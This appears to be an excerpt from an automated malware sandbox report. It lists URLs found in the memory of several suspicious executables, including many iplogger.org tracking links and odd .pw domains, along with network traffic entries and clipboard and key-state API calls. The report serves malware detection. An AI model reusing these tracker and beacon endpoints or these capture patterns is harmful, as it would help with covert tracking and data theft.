Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB46JmN?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: hjjgaa.exe String found in binary or memory: http://ip-api.com/json/countryCodecountry_codemac%s.exeSoftware
Source: Setup.exe, 0000000F.00000000.288312686.0000000000409000.00000002.00020000.sdmp, Setup.exe.0.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp, hjjgaa.exe String found in binary or memory: http://ocsp.comodoca.com0
Source: jg2_2qua.exe, 0000001A.00000003.495900990.0000000003EB9000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: jg2_2qua.exe, 0000001A.00000003.495377246.0000000003FC0000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: jg2_2qua.exe, 0000001A.00000003.495377246.0000000003FC0000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.489035024.0000000003DA7000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp, SibClr.dll.15.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: 85F91A36E275562F.exe.19.dr String found in binary or memory: http://ocsp.thawte.com0
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: jg2_2qua.exe, 0000001A.00000003.493935204.0000000003F10000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
Source: jg2_2qua.exe, 0000001A.00000003.493935204.0000000003F10000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: jg2_2qua.exe, 0000001A.00000003.493311716.0000000003D67000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuG4N.img?h=75&w=100&
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuQtg.img?h=166&w=310
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTly.img?h=166&w=310
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuY5J.img?h=166&w=310
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuqZ9.img?h=75&w=100&
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=333&w=311
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvrrg.img?h=166&w=310
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXiwM.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18qTPD.img?h=16&w=16&
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xJbM.img?h=75&w=100
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yHSm.img?h=75&w=100
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=250&w=30
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yqHP.img?h=75&w=100
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
Source: 85F91A36E275562F.exe.19.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 85F91A36E275562F.exe.19.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 85F91A36E275562F.exe.19.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: askinstall21.exeString found in binary or memory: http://www.fddnice.pw/
Source: askinstall21.exeString found in binary or memory: http://www.ipcode.pw/
Source: askinstall21.exeString found in binary or memory: http://www.ipcode.pw/0.0.0.0CNpathSOFTWARE
Source: jg2_2qua.exe, 0000001A.00000003.502245420.0000000004088000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: ubisoftpro.exeString found in binary or memory: http://www.winimage.com/zLibDll
Source: askinstall21.exeString found in binary or memory: http://www.zxfc.pw/Home/Index/sksxz?uid=3a1c3033bf5a5764882caec7a4cf3849e7de2ef2a8d79cece23467f1d887
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: Setup.exe, 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmpString found in binary or memory: https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_
Source: jg2_2qua.exe, 0000001A.00000003.498781258.00000000040A8000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: aliens.exe, 00000013.00000002.508576720.0000000000BB7000.00000004.00000020.sdmpString found in binary or memory: https://charlesproxy.com/ssl1
Source: jg2_2qua.exe, 0000001A.00000003.502245420.0000000004088000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: jg2_2qua.exe, 0000001A.00000003.493950837.0000000003F18000.00000004.00000001.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BE6B7572D
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/16ajh7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/16xjh7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/19iM77
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1Ka7t7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1KyTy7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1O2BH
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1OXFG
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1OZVH
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1OhAG
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1T79i7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1T89i7
Source: John_Ship.urlString found in binary or memory: https://iplogger.org/1TT4a7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1TW3i7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1UpU57
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1Uts87
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1X8M97
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1XJq97
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1XKq97
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1XSq97
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1b4887
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1bV787
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1lC5g
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1q6Jt7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1uVkt7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1yXwr7
Source: ubisoftpro.exeString found in binary or memory: https://iplogger.org/2WS9q6ubisoftplushttps://iplogger.org/2WF9q6ubisoftsmphttps://iplogger.org/2WJ9
Source: ubisoftpro.exeString found in binary or memory: https://iplogger.org/2WX9q6ubisoftmorehttps://iplogger.org/2WN9q6ubisoftablehttps://iplogger.org/2W6
Source: jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.480069462.0000000000724000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/ZdnY7
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp, SibClr.dll.15.drString found in binary or memory: https://sectigo.com/CPS0
Source: hjjgaa.exeString found in binary or memory: https://sectigo.com/CPS0B
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drString found in binary or memory: https://sectigo.com/CPS0D
Source: ubisoftpro.exeString found in binary or memory: https://www.airbnb.cn/account-settings
Source: ubisoftpro.exeString found in binary or memory: https://www.airbnb.cn/account-settingstext/html
Source: jg2_2qua.exe, 0000001A.00000003.489035024.0000000003DA7000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: jg2_2qua.exe, 0000001A.00000003.502245420.0000000004088000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.496197862.0000000004020000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
Source: jg2_2qua.exe, 0000001A.00000003.493950837.0000000003F18000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: jg2_2qua.exe, 0000001A.00000003.497641721.0000000004020000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.h
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.496197862.0000000004020000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: jg2_2qua.exe, 0000001A.00000003.493311716.0000000003D67000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Code function: 15_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_0046C604 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Code function: 15_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
Source: Setup.exe, 0000000F.00000002.468343589.000000000077A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | Code function: 1_2_0126BF99 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
